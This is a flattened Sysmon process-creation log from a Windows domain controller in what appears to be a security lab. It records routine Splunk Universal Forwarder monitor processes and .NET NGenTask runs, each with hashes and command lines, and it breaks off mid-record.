154100x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:25.134{A8622C2F-40E1-6078-0302-00000000AE01}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:24.462{A8622C2F-40E0-6078-FA01-00000000AE01}2584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:23.791{A8622C2F-40DF-6078-F801-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:22.667{A8622C2F-40DE-6078-EC01-00000000AE01}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:21.837{A8622C2F-40DD-6078-E401-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:21.040{A8622C2F-40DD-6078-E301-00000000AE01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:26.414{A8622C2F-40A6-6078-6901-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:25.041{A8622C2F-40A5-6078-6801-00000000AE01}2288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:24.524{A8622C2F-40A4-6078-6701-00000000AE01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:23.852{A8622C2F-40A3-6078-6601-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:22.727{A8622C2F-40A2-6078-6501-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:21.821{A8622C2F-40A1-6078-6401-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:33:21.024{A8622C2F-40A1-6078-6301-00000000AE01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:26.413{A8622C2F-406A-6078-3901-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:25.319{A8622C2F-4069-6078-3601-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:24.647{A8622C2F-4068-6078-3401-00000000AE01}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:23.836{A8622C2F-4067-6078-3201-00000000AE01}1660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:22.710{A8622C2F-4066-6078-3001-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:21.820{A8622C2F-4065-6078-2F01-00000000AE01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:32:21.022{A8622C2F-4065-6078-2E01-00000000AE01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:52.466{A8622C2F-4048-6078-2101-00000000AE01}3012C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe4.8.4330.0 built by: NET48REL1LAST_BMicrosoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:772C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=196F531423F864F990B24F3D3AFA9AA1,SHA256=353C8C617C87A56F93C9914E219BE4E30A45A0DEA8D98BF34C6BD81A6A287916,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A8622C2F-4047-6078-1901-00000000AE01}4696C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 154100x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:52.455{A8622C2F-4048-6078-1F01-00000000AE01}2700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe4.8.4330.0 built by: NET48REL1LAST_BMicrosoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:404C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=D2DDF021EE6A8A649FB58F6DD05EDED7,SHA256=AC1B312B5D048DAC81327CF083BDEF2966AA883208455490E73D6E34C932B7D9,IMPHASH=00000000000000000000000000000000{A8622C2F-4047-6078-1901-00000000AE01}4696C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 154100x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:26.395{A8622C2F-402E-6078-1801-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:25.176{A8622C2F-402D-6078-1701-00000000AE01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:24.504{A8622C2F-402C-6078-1601-00000000AE01}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:23.832{A8622C2F-402B-6078-1501-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:22.692{A8622C2F-402A-6078-1401-00000000AE01}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:21.864{A8622C2F-4029-6078-1301-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:31:21.020{A8622C2F-4029-6078-1201-00000000AE01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:26.376{A8622C2F-3FF2-6078-1101-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:25.157{A8622C2F-3FF1-6078-1001-00000000AE01}1384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:24.485{A8622C2F-3FF0-6078-0F01-00000000AE01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:23.813{A8622C2F-3FEF-6078-0E01-00000000AE01}1376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:22.688{A8622C2F-3FEE-6078-0D01-00000000AE01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk 